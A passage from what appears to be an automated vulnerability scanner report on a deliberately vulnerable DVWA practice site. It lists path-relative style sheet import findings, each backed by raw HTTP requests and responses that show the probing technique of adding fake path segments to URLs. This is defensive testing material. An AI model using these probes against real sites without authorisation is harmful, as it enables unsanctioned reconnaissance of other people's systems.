Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:26 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4235
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../dvwa/css/help.css" />
<link rel="icon" type="\image/ico" href="../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/view_help.php/hab44k/sbqyox/?id=brute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:51 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4235
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../dvwa/css/help.css" />
<link rel="icon" type="\image/ico" href="../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/view_help.php/hab44k/dvwa/css/help.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=3a4caf980e8226c982399504aa20892e
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:51 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 450
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Help :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="st
...[SNIP]...
19.21. https://pentest-ground.com:4280/vulnerabilities/view_source.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_source.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/view_source.php?id=brute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:10 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6531
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../dvwa/css/source.css" />
<link rel="icon" type="\image/ico" href="../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/view_source.php/sqj1v7/clrxma/?id=brute&security=low HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 6531
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../dvwa/css/source.css" />
<link rel="icon" type="\image/ico" href="../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/view_source.php/sqj1v7/dvwa/css/source.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=56125bcc235c28c9f2cdcb2bd7a6469c
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 454
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Source :: Damn Vulnerable Web App
...[SNIP]...
19.22. https://pentest-ground.com:4280/vulnerabilities/weak_id/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/weak_id/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:18 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=1
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
POST /vulnerabilities/weak_id/index.php/ojjref/md4l4o/fok1ur/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:31 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=114
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
POST /vulnerabilities/weak_id/index.php/ojjref/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=ef21cca5a5b7e9f24f5235ea0fb84b87
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/weak_id/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:49:31 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3427
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: dvwaSession=115
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Weak Session IDs :: Damn Vulnerable Web Application (DVWA
...[SNIP]...
19.23. https://pentest-ground.com:4280/vulnerabilities/xss_d/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_d/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/xss_d/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=a41b29b87c4b3d8b45a7685b6e4911ec
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/xss_d/index.php/wket4n/kgip79/d0esuo/?default=Spanish HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=a41b29b87c4b3d8b45a7685b6e4911ec
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/xss_d/index.php/wket4n/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=a41b29b87c4b3d8b45a7685b6e4911ec
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_d/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4612
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: DOM Based Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
19.24. https://pentest-ground.com:4280/vulnerabilities/xss_r/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_r/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/xss_r/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c9781a30e3d2456bbd71d8ea3238540f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:04 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/xss_r/index.php/cqfjfd/gfdlwf/tt6y9y/?name=YIQlvlCg HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c9781a30e3d2456bbd71d8ea3238540f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/xss_r/index.php/cqfjfd/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c9781a30e3d2456bbd71d8ea3238540f
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/xss_r/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4216
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Reflected Cross Site Scripting (XSS) :: Damn Vulnerable W
...[SNIP]...
19.25. https://pentest-ground.com:4280/vulnerabilities/xss_s/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/xss_s/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/xss_s/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=724579ea60f345080dd53da2e8061fcb
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4868
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/xss_s/index.php/ln9pdr/llde55/v0x7vv/ HTTP/1.1
Host: pentest-ground.com:4280
